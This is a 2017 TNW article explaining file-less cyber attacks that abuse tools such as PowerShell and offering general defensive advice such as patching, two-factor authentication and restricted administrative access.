The heart of tech is coming to the heart of the Mediterranean. Join TNW in València this March 🇪🇸

This article was published on October 28, 2017

What are file-less cyber attacks and how do you protect against them

What are file-less cyber attacks and how do you protect against them
Peter Buttler
Story by

Peter Buttler

Peter Buttler is an Info Security Journalist and Tech Reporter, who contributes to a number of online publications, including Infosecurity-m Peter Buttler is an Info Security Journalist and Tech Reporter, who contributes to a number of online publications, including Infosecurity-magazine, SC Magazine UK, Tripwire, Globalsign and CSO Australia, among others. He covers different topics related to Online Security, Big data, IoT and Artificial Intelligence. With more than seven years of IT experience, he also holds a Master’s degree in cybersecurity and technology.

Businesses and internet users are finally becoming more aware of the danger of cyber attacks. They’ve started to boost their defending techniques, leaving hackers with fewer options to carry out their malicious deeds.

However, exploiting a vulnerability is just a matter of techniques and available resources; so a good detection is all that decides the time span a hacker could stay inside a network. This is extremely important because there’s a new hacking technique on the rise, called “file-less cyber attacks”.

This new attacking technique could bypass antivirus software and corporate firewalls without being detected. The new breed of attacks can be especially damaging because it accesses the corporate networks without any malware inside its programming.   

A malicious hacker could therefore gain access to your system with relative ease, by invading weak software and infiltrating the source code. Once the hacker enters your system, he/she can embed code which could destruct, acquire, or demolish important data without leaving a trace. The hacker could, for example, control operating system tools such as Windows Management Instrumental or PowerShell.

A silent risk

Technical advancements keep making our data and systems safer, but unfortuantely it seem that malware infections develop at the same rate. This caters the hackers to alter their tactics accordingly to make their attacks more potent and responsive than the previous.

File-less cyber attacks have been increasing in the past few months, which is extremely worrisome because by not leaving a footprint, they can be even more destructive than ransomware.

That’s why the Prudential Regulation Authority has called it a “Silent risk”. The attackers behind such attack have various intentions including access to intellectual property, personally identifiable information (PII), or any information relevant to strategic intelligence. Basically, all the incredibly important stuff.

For those who know the existing antivirus vendor and their techniques probably aren’t that surprised that hackers have come up with file-less approach. It’s convenient and allows hackers to attack without using conventional executable files. That means they could get similar results through embedding their malicious code into an apparent benign file such as PDF or Word.

The companies and organization which that operate on legacy operating system are almost begging to be attacked, seeing that legacy OS often possess irregularly managed antivirus software or the ones which are just about to die. It goes without saying that when software halts the release of patches for that specific operating system, your business becomes an easy prey for a cyber attack.

However, these inefficient security controls are creating a false sense of security giving a wider margin to the threat actors to ever more inventive ways of circumventing the detection techniques arrayed against them.

Even in the case of obvious threats such as ransomware, the incompetent techniques are witnessed by most of the firms and businesses. Therefore, the file-less cyber attack could be far more lethal as it remains undetected for a long time period.  

Protecting against the ultimate threat

If organizations want to be able to withstand new attacks, they must have proper pre-planned policy to manage malware invasions and the rise of file-less attacks. We can’t rely on old methods and we need to switch to in-depth and strict initiatives to defend against untraceable silent threats.

So here’s what we need to do:

  • Invest in primary security protections such as high-quality end-to-end encryption, two-factor authentication and installation of latest efficient anti-virus software with regular update could help eradicate the security lacks prevailing into the business organization. Duh.

Faulted anti-virus programs are mostly inefficient in restricting an attack. For instance, only 10 out of 61 antivirus software were able to stop the NotPetya attack — which is terrible.

  • We also need to emphasize ‘laws and regulations’, such as a controlled and restricted administrative access is a vital part of the security of a business. You should be strict when it comes to managing the permissions, limiting them to just what each level of the individual requires.
  • Be aware that Lack of knowledge to the existing and upcoming security threats could be detrimental for an organization. Cases such as file-less attacks should immediately be reported by every organization otherwise we may have to wait for another destructive attack such as WannaCry to compel businesses to invest in latest security, next generation firewalls and system upgrades.

However, all the organizations and firms should acknowledge the fact that nothing could fully eradicate the ever improving cyber threats. Instead, they should identify a potential threat with a little evidence and must implement intelligent solution according to the nature of the attack. Also, they must keep their systems updated with continuous data backup and security checks.

Back to top